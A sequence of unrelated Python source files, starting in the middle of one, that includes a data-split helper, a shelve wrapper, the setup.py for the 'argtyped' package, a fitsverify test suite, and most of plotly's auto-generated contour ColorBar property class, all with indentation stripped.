tst_img = itemgetter(*pos_tst)(actions[2])
trn_lbl = itemgetter(*pos_trn)(actions[3])
val_lbl = actions[4]
tst_lbl = itemgetter(*pos_tst)(actions[5])
return trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl
# get equally distributed samples among given classes from a split
def get_ed_samples(data, samples=10):
# retrieve number of samples for each class
indx = []
classes = np.unique(data.labels)
for cl in range(len(classes)):
tmp = np.where(data.labels == classes[cl])[0]
np.random.shuffle(tmp)
        indx = np.hstack((indx, tmp[0:min(samples, len(tmp))]))
indx = np.asarray(indx).astype(int)
return indx
|
py | 1a4fbca25f8dd38f911b3531531fbb801460f065 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import shelve
import db_config
ROOT = os.getcwd()
class Shelf:
def __init__(self):
self.db = shelve.open('db')
def set(self, key, value):
self.db[key] = value
def add_elem(self, key, value):
try:
self.db[key].add(value)
except KeyError:
pass
def get(self, key):
return self.db[key]
def close(self):
self.db.close()
d = Shelf()
# # appointment = db_config.appointment
# # problem = db_config.problem
# # advice = db_config.advice
gingvit = db_config.gingvit
pulpit = db_config.pulpit
stomatit = db_config.stomatit
d.set('stomatit', set(stomatit))
# # print(type(d.get('advice')))
d.close()
|
py | 1a4fbeabcbf7de154eae3dee3e14cc235a2f91f4 | import setuptools
with open("README.md", "r") as f:
long_description = f.read()
setuptools.setup(
name="argtyped",
version="0.3.1",
url="https://github.com/huzecong/argtyped",
author="Zecong Hu",
author_email="[email protected]",
description="Command line arguments, with types",
long_description=long_description,
long_description_content_type="text/markdown",
license="MIT License",
packages=setuptools.find_packages(),
package_data={
"argtyped": [
"py.typed", # indicating type-checked package
],
},
platforms="any",
install_requires=[],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: System :: Shells",
"Topic :: Utilities",
"Typing :: Typed",
],
python_requires=">=3.6",
)
|
py | 1a4fbf375604f5c6527e696cb5d0dfd6ddb66068 |
# Plots are currently included as images, because example is too big to
# run on readthedocs servers
"""
Cortical depth estimation from MGDM segmentation
=================================================
This example shows how to obtain a cortical laminar depth representation
from an MGDM segmentation.
"""
import response_fytter
|
py | 1a4fbf535e58380a69fb15bc9a0ea3ead4978513 | # pytest suite
"""
Tests for the fitsverify module.
This is a suite of tests to be run with pytest.
To run:
1) Set the environment variable GEMPYTHON_TESTDATA to the path that contains
the gempython test data files.
This suite uses the file N20130510S0178_forStack.fits.
Eg. /net/chara/data2/pub/gempython_testdata
2) From the ??? (location): py.test -v
"""
import pytest
import os
import os.path
from gempy.library import fitsverify
TESTDATAPATH = os.getenv('GEMPYTHON_TESTDATA', '.')
TESTFITS = os.path.join('GMOS', 'N20130510S0178_forStack.fits')
class TestFitsverify:
"""
Suite of tests for the functions in the fitsverify module.
"""
@classmethod
def setup_class(cls):
"""Run once at the beginning."""
TestFitsverify.fits_file = os.path.join(TESTDATAPATH, TESTFITS)
@classmethod
def teardown_class(cls):
"""Run once at the end."""
pass
def setup_method(self, method):
"""Run once before every test."""
pass
def teardown_method(self, method):
"""Run once after every test."""
pass
@pytest.mark.skip(reason='Uses local data')
def test_fitsverify(self):
"""
Test the return values of fitsverify on our test file.
"""
returned_values = fitsverify.fitsverify(TestFitsverify.fits_file)
assert returned_values[:3] == [1, '21', '0']
|
py | 1a4fbfb8c6770fee513d8763a8567b4b9f4a7a74 | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class ColorBar(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "contour"
_path_str = "contour.colorbar"
_valid_props = {
"bgcolor",
"bordercolor",
"borderwidth",
"dtick",
"exponentformat",
"len",
"lenmode",
"nticks",
"outlinecolor",
"outlinewidth",
"separatethousands",
"showexponent",
"showticklabels",
"showtickprefix",
"showticksuffix",
"thickness",
"thicknessmode",
"tick0",
"tickangle",
"tickcolor",
"tickfont",
"tickformat",
"tickformatstopdefaults",
"tickformatstops",
"ticklen",
"tickmode",
"tickprefix",
"ticks",
"ticksuffix",
"ticktext",
"ticktextsrc",
"tickvals",
"tickvalssrc",
"tickwidth",
"title",
"titlefont",
"titleside",
"x",
"xanchor",
"xpad",
"y",
"yanchor",
"ypad",
}
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the color of padded area.
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["bgcolor"]
@bgcolor.setter
def bgcolor(self, val):
self["bgcolor"] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the axis line color.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["bordercolor"]
@bordercolor.setter
def bordercolor(self, val):
self["bordercolor"] = val
# borderwidth
# -----------
@property
def borderwidth(self):
"""
        Sets the width (in px) of the border enclosing this color bar.
The 'borderwidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["borderwidth"]
@borderwidth.setter
def borderwidth(self, val):
self["borderwidth"] = val
# dtick
# -----
@property
def dtick(self):
"""
Sets the step in-between ticks on this axis. Use with `tick0`.
Must be a positive number, or special strings available to
"log" and "date" axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick number. For
example, to set a tick mark at 1, 10, 100, 1000, ... set dtick
to 1. To set tick marks at 1, 100, 10000, ... set dtick to 2.
To set tick marks at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special values;
"L<f>", where `f` is a positive number, gives ticks linearly
spaced in value (but not position). For example `tick0` = 0.1,
`dtick` = "L0.5" will put ticks at 0.1, 0.6, 1.1, 1.6 etc. To
show powers of 10 plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is ignored for "D1" and
"D2". If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval between
ticks to one day, set `dtick` to 86400000.0. "date" also has
special values "M<n>" gives ticks spaced by a number of months.
`n` must be a positive integer. To set ticks on the 15th of
every third month, set `tick0` to "2000-01-15" and `dtick` to
"M3". To set ticks every 4 years, set `dtick` to "M48"
The 'dtick' property accepts values of any type
Returns
-------
Any
"""
return self["dtick"]
@dtick.setter
def dtick(self, val):
self["dtick"] = val
# exponentformat
# --------------
@property
def exponentformat(self):
"""
Determines a formatting rule for the tick exponents. For
example, consider the number 1,000,000,000. If "none", it
appears as 1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If "SI", 1G. If
"B", 1B.
The 'exponentformat' property is an enumeration that may be specified as:
- One of the following enumeration values:
['none', 'e', 'E', 'power', 'SI', 'B']
Returns
-------
Any
"""
return self["exponentformat"]
@exponentformat.setter
def exponentformat(self, val):
self["exponentformat"] = val
# len
# ---
@property
def len(self):
"""
        Sets the length of the color bar. This measure excludes the
padding of both ends. That is, the color bar length is this
length minus the padding on both ends.
The 'len' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["len"]
@len.setter
def len(self, val):
self["len"] = val
# lenmode
# -------
@property
def lenmode(self):
"""
Determines whether this color bar's length (i.e. the measure in
the color variation direction) is set in units of plot
"fraction" or in *pixels. Use `len` to set the value.
The 'lenmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['fraction', 'pixels']
Returns
-------
Any
"""
return self["lenmode"]
@lenmode.setter
def lenmode(self, val):
self["lenmode"] = val
# nticks
# ------
@property
def nticks(self):
"""
Specifies the maximum number of ticks for the particular axis.
The actual number of ticks will be chosen automatically to be
less than or equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
The 'nticks' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["nticks"]
@nticks.setter
def nticks(self, val):
self["nticks"] = val
# outlinecolor
# ------------
@property
def outlinecolor(self):
"""
Sets the axis line color.
The 'outlinecolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["outlinecolor"]
@outlinecolor.setter
def outlinecolor(self, val):
self["outlinecolor"] = val
# outlinewidth
# ------------
@property
def outlinewidth(self):
"""
Sets the width (in px) of the axis line.
The 'outlinewidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["outlinewidth"]
@outlinewidth.setter
def outlinewidth(self, val):
self["outlinewidth"] = val
# separatethousands
# -----------------
@property
def separatethousands(self):
"""
If "true", even 4-digit integers are separated
The 'separatethousands' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["separatethousands"]
@separatethousands.setter
def separatethousands(self, val):
self["separatethousands"] = val
# showexponent
# ------------
@property
def showexponent(self):
"""
If "all", all exponents are shown besides their significands.
If "first", only the exponent of the first tick is shown. If
"last", only the exponent of the last tick is shown. If "none",
no exponents appear.
The 'showexponent' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self["showexponent"]
@showexponent.setter
def showexponent(self, val):
self["showexponent"] = val
# showticklabels
# --------------
@property
def showticklabels(self):
"""
Determines whether or not the tick labels are drawn.
The 'showticklabels' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showticklabels"]
@showticklabels.setter
def showticklabels(self, val):
self["showticklabels"] = val
# showtickprefix
# --------------
@property
def showtickprefix(self):
"""
If "all", all tick labels are displayed with a prefix. If
"first", only the first tick is displayed with a prefix. If
"last", only the last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
The 'showtickprefix' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self["showtickprefix"]
@showtickprefix.setter
def showtickprefix(self, val):
self["showtickprefix"] = val
# showticksuffix
# --------------
@property
def showticksuffix(self):
"""
Same as `showtickprefix` but for tick suffixes.
The 'showticksuffix' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self["showticksuffix"]
@showticksuffix.setter
def showticksuffix(self, val):
self["showticksuffix"] = val
# thickness
# ---------
@property
def thickness(self):
"""
        Sets the thickness of the color bar. This measure excludes the
size of the padding, ticks and labels.
The 'thickness' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["thickness"]
@thickness.setter
def thickness(self, val):
self["thickness"] = val
# thicknessmode
# -------------
@property
def thicknessmode(self):
"""
Determines whether this color bar's thickness (i.e. the measure
in the constant color direction) is set in units of plot
"fraction" or in "pixels". Use `thickness` to set the value.
The 'thicknessmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['fraction', 'pixels']
Returns
-------
Any
"""
return self["thicknessmode"]
@thicknessmode.setter
def thicknessmode(self, val):
self["thicknessmode"] = val
# tick0
# -----
@property
def tick0(self):
"""
Sets the placement of the first tick on this axis. Use with
`dtick`. If the axis `type` is "log", then you must take the
log of your starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when `dtick`=*L<f>* (see
`dtick` for more info). If the axis `type` is "date", it should
be a date string, like date data. If the axis `type` is
"category", it should be a number, using the scale where each
category is assigned a serial number from zero in the order it
appears.
The 'tick0' property accepts values of any type
Returns
-------
Any
"""
return self["tick0"]
@tick0.setter
def tick0(self, val):
self["tick0"] = val
# tickangle
# ---------
@property
def tickangle(self):
"""
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the tick
labels vertically.
The 'tickangle' property is a angle (in degrees) that may be
specified as a number between -180 and 180. Numeric values outside this
range are converted to the equivalent value
(e.g. 270 is converted to -90).
Returns
-------
int|float
"""
return self["tickangle"]
@tickangle.setter
def tickangle(self, val):
self["tickangle"] = val
# tickcolor
# ---------
@property
def tickcolor(self):
"""
Sets the tick color.
The 'tickcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["tickcolor"]
@tickcolor.setter
def tickcolor(self, val):
self["tickcolor"] = val
# tickfont
# --------
@property
def tickfont(self):
"""
Sets the color bar's tick label font
The 'tickfont' property is an instance of Tickfont
that may be specified as:
- An instance of :class:`plotly.graph_objs.contour.colorbar.Tickfont`
- A dict of string/value properties that will be passed
to the Tickfont constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.contour.colorbar.Tickfont
"""
return self["tickfont"]
@tickfont.setter
def tickfont(self, val):
self["tickfont"] = val
# tickformat
# ----------
@property
def tickformat(self):
"""
Sets the tick label formatting rule using d3 formatting mini-
languages which are very similar to those in Python. For
numbers, see: https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format And for dates
see: https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format We add one item
to d3's date formatter: "%{n}f" for fractional seconds with n
digits. For example, *2016-10-13 09:15:23.456* with tickformat
"%H~%M~%S.%2f" would display "09~15~23.46"
The 'tickformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["tickformat"]
@tickformat.setter
def tickformat(self, val):
self["tickformat"] = val
# tickformatstops
# ---------------
@property
def tickformatstops(self):
"""
The 'tickformatstops' property is a tuple of instances of
Tickformatstop that may be specified as:
- A list or tuple of instances of plotly.graph_objs.contour.colorbar.Tickformatstop
- A list or tuple of dicts of string/value properties that
will be passed to the Tickformatstop constructor
Supported dict properties:
dtickrange
range [*min*, *max*], where "min", "max" -
dtick values which describe some zoom level, it
is possible to omit "min" or "max" value by
passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level,
the same as "tickformat"
Returns
-------
tuple[plotly.graph_objs.contour.colorbar.Tickformatstop]
"""
return self["tickformatstops"]
@tickformatstops.setter
def tickformatstops(self, val):
self["tickformatstops"] = val
# tickformatstopdefaults
# ----------------------
@property
def tickformatstopdefaults(self):
"""
When used in a template (as
layout.template.data.contour.colorbar.tickformatstopdefaults),
sets the default property values to use for elements of
contour.colorbar.tickformatstops
The 'tickformatstopdefaults' property is an instance of Tickformatstop
that may be specified as:
- An instance of :class:`plotly.graph_objs.contour.colorbar.Tickformatstop`
- A dict of string/value properties that will be passed
to the Tickformatstop constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.contour.colorbar.Tickformatstop
"""
return self["tickformatstopdefaults"]
@tickformatstopdefaults.setter
def tickformatstopdefaults(self, val):
self["tickformatstopdefaults"] = val
# ticklen
# -------
@property
def ticklen(self):
"""
Sets the tick length (in px).
The 'ticklen' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["ticklen"]
@ticklen.setter
def ticklen(self, val):
self["ticklen"] = val
# tickmode
# --------
@property
def tickmode(self):
"""
Sets the tick mode for this axis. If "auto", the number of
ticks is set via `nticks`. If "linear", the placement of the
ticks is determined by a starting position `tick0` and a tick
step `dtick` ("linear" is the default value if `tick0` and
`dtick` are provided). If "array", the placement of the ticks
is set via `tickvals` and the tick text is `ticktext`. ("array"
is the default value if `tickvals` is provided).
The 'tickmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['auto', 'linear', 'array']
Returns
-------
Any
"""
return self["tickmode"]
@tickmode.setter
def tickmode(self, val):
self["tickmode"] = val
# tickprefix
# ----------
@property
def tickprefix(self):
"""
Sets a tick label prefix.
The 'tickprefix' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["tickprefix"]
@tickprefix.setter
def tickprefix(self, val):
self["tickprefix"] = val
# ticks
# -----
@property
def ticks(self):
"""
Determines whether ticks are drawn or not. If "", this axis'
        ticks are not drawn. If "outside" ("inside"), this axis'
        ticks are drawn outside (inside) the axis lines.
The 'ticks' property is an enumeration that may be specified as:
- One of the following enumeration values:
['outside', 'inside', '']
Returns
-------
Any
"""
return self["ticks"]
@ticks.setter
def ticks(self, val):
self["ticks"] = val
# ticksuffix
# ----------
@property
def ticksuffix(self):
"""
Sets a tick label suffix.
The 'ticksuffix' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["ticksuffix"]
@ticksuffix.setter
def ticksuffix(self, val):
self["ticksuffix"] = val
# ticktext
# --------
@property
def ticktext(self):
"""
Sets the text displayed at the ticks position via `tickvals`.
Only has an effect if `tickmode` is set to "array". Used with
`tickvals`.
The 'ticktext' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["ticktext"]
@ticktext.setter
def ticktext(self, val):
self["ticktext"] = val
# ticktextsrc
# -----------
@property
def ticktextsrc(self):
"""
Sets the source reference on Chart Studio Cloud for ticktext .
The 'ticktextsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["ticktextsrc"]
@ticktextsrc.setter
def ticktextsrc(self, val):
self["ticktextsrc"] = val
# tickvals
# --------
@property
def tickvals(self):
"""
Sets the values at which ticks on this axis appear. Only has an
effect if `tickmode` is set to "array". Used with `ticktext`.
The 'tickvals' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["tickvals"]
@tickvals.setter
def tickvals(self, val):
self["tickvals"] = val
# tickvalssrc
# -----------
@property
def tickvalssrc(self):
"""
Sets the source reference on Chart Studio Cloud for tickvals .
The 'tickvalssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["tickvalssrc"]
@tickvalssrc.setter
def tickvalssrc(self, val):
self["tickvalssrc"] = val
# tickwidth
# ---------
@property
def tickwidth(self):
"""
Sets the tick width (in px).
The 'tickwidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["tickwidth"]
@tickwidth.setter
def tickwidth(self, val):
self["tickwidth"] = val
# title
# -----
@property
def title(self):
"""
The 'title' property is an instance of Title
that may be specified as:
- An instance of :class:`plotly.graph_objs.contour.colorbar.Title`
- A dict of string/value properties that will be passed
to the Title constructor
Supported dict properties:
font
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
side
Determines the location of color bar's title
with respect to the color bar. Note that the
title's location used to be set by the now
deprecated `titleside` attribute.
text
Sets the title of the color bar. Note that
before the existence of `title.text`, the
title's contents used to be defined as the
`title` attribute itself. This behavior has
been deprecated.
Returns
-------
plotly.graph_objs.contour.colorbar.Title
"""
return self["title"]
@title.setter
def title(self, val):
self["title"] = val
# titlefont
# ---------
@property
def titlefont(self):
"""
Deprecated: Please use contour.colorbar.title.font instead.
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.contour.colorbar.title.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
"""
return self["titlefont"]
@titlefont.setter
def titlefont(self, val):
self["titlefont"] = val
# titleside
# ---------
@property
def titleside(self):
"""
Deprecated: Please use contour.colorbar.title.side instead.
Determines the location of color bar's title with respect to
the color bar. Note that the title's location used to be set by
the now deprecated `titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
"""
return self["titleside"]
@titleside.setter
def titleside(self, val):
self["titleside"] = val
# x
# -
@property
def x(self):
"""
Sets the x position of the color bar (in plot fraction).
The 'x' property is a number and may be specified as:
- An int or float in the interval [-2, 3]
Returns
-------
int|float
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# xanchor
# -------
@property
def xanchor(self):
"""
Sets this color bar's horizontal position anchor. This anchor
binds the `x` position to the "left", "center" or "right" of
the color bar.
The 'xanchor' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'center', 'right']
Returns
-------
Any
"""
return self["xanchor"]
@xanchor.setter
def xanchor(self, val):
self["xanchor"] = val
# xpad
# ----
@property
def xpad(self):
"""
Sets the amount of padding (in px) along the x direction.
The 'xpad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["xpad"]
@xpad.setter
def xpad(self, val):
self["xpad"] = val
# y
# -
@property
def y(self):
"""
Sets the y position of the color bar (in plot fraction).
The 'y' property is a number and may be specified as:
- An int or float in the interval [-2, 3]
Returns
-------
int|float
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# yanchor
# -------
@property
def yanchor(self):
"""
        Sets this color bar's vertical position anchor. This anchor
binds the `y` position to the "top", "middle" or "bottom" of
the color bar.
The 'yanchor' property is an enumeration that may be specified as:
- One of the following enumeration values:
['top', 'middle', 'bottom']
Returns
-------
Any
"""
return self["yanchor"]
@yanchor.setter
def yanchor(self, val):
self["yanchor"] = val
